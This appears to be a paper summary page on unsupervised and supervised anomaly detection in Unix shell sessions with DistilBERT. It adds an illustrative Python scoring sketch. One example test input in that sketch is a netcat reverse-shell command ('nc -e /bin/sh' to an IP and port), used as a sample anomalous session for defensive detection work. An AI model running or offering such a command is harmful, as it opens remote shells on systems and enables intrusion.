Anomaly Detection of Command Shell Sessions based on DistilBERT: Unsupervised and Supervised Approaches
Zefang Liu, John Buford

TL;DR
This paper explores using DistilBERT, a transformer-based model, for detecting anomalies in Unix shell sessions through both unsupervised and supervised methods, improving security analysis with minimal data labeling.
Contribution
It introduces a novel application of DistilBERT for Unix shell anomaly detection using combined unsupervised and supervised techniques, reducing the need for extensive labeled data.
Findings
Experiments on a large-scale enterprise dataset collected from production systems demonstrate effective detection of anomalous shell sessions.
The unsupervised approach detects sessions that deviate from normal behavior without requiring labeled data.
The supervised method further improves detection accuracy.
Abstract
Anomaly detection in command shell sessions is a critical aspect of computer security. Recent advances in deep learning and natural language processing, particularly transformer-based models, have shown great promise for addressing complex security challenges. In this paper, we implement a comprehensive approach to detect anomalies in Unix shell sessions using a pretrained DistilBERT model, leveraging both unsupervised and supervised learning techniques to identify anomalous activity while minimizing data labeling. The unsupervised method captures the underlying structure and syntax of Unix shell commands, enabling the detection of session deviations from normal behavior. Experiments on a large-scale enterprise dataset collected from production systems demonstrate the effectiveness of our approach in detecting anomalous behavior in Unix shell sessions. This work highlights the potential…
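As a rough illustration of the unsupervised idea in the abstract (flagging sessions that deviate from normal behavior), the sketch below scores each session by its cosine distance from the centroid of a set of reference sessions. It is not the authors' pipeline: `embed_session` is a hypothetical toy embedding built from token counts, standing in for a representation that would come from the DistilBERT model, and `anomaly_scores` and `UNK` are likewise illustrative names.

```python
import math
from collections import Counter

UNK = "<unk>"  # shared bucket for tokens never seen in the reference sessions


def embed_session(session, vocab):
    """Toy stand-in for a learned session embedding: unit-length token counts.

    Assumption: a real system would use model-derived embeddings instead.
    """
    counts = Counter(tok if tok in vocab else UNK for tok in session.split())
    norm = math.sqrt(sum(c * c for c in counts.values()))
    return {tok: c / norm for tok, c in counts.items()} if norm else {}


def anomaly_scores(reference_sessions, test_sessions):
    """Cosine distance of each test session from the reference centroid.

    Assumes reference_sessions is non-empty and contains at least one token.
    """
    vocab = {tok for s in reference_sessions for tok in s.split()}

    # Sum the unit vectors of all reference sessions, then normalise;
    # this has the same direction as their mean.
    centroid = Counter()
    for s in reference_sessions:
        for tok, weight in embed_session(s, vocab).items():
            centroid[tok] += weight
    norm = math.sqrt(sum(w * w for w in centroid.values()))
    centroid = {tok: w / norm for tok, w in centroid.items()}

    scores = []
    for s in test_sessions:
        vec = embed_session(s, vocab)
        similarity = sum(w * centroid.get(tok, 0.0) for tok, w in vec.items())
        scores.append(1.0 - similarity)  # higher means more unusual
    return scores


# Hypothetical sessions, for illustration only.
normal = ["ls -la", "cd /tmp", "ls -la /tmp", "cat notes.txt"]
scores = anomaly_scores(normal, ["ls -la", "nc -e /bin/sh 10.0.0.1 4444"])
print(scores)
```

A session made up entirely of unseen tokens lands in the `UNK` bucket and receives the maximum distance, while a session that resembles the reference set scores lower. In practice a threshold on this score, or a dedicated outlier detector, would decide which sessions to flag.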
Taxonomy
Topics: Network Security and Intrusion Detection · Advanced Malware Detection Techniques · Software System Performance and Reliability
Methods: Multi-Head Attention · Attention Is All You Need · Linear Layer · Attention Dropout · Softmax · Dense Connections · Adam · Residual Connection · WordPiece · Dropout
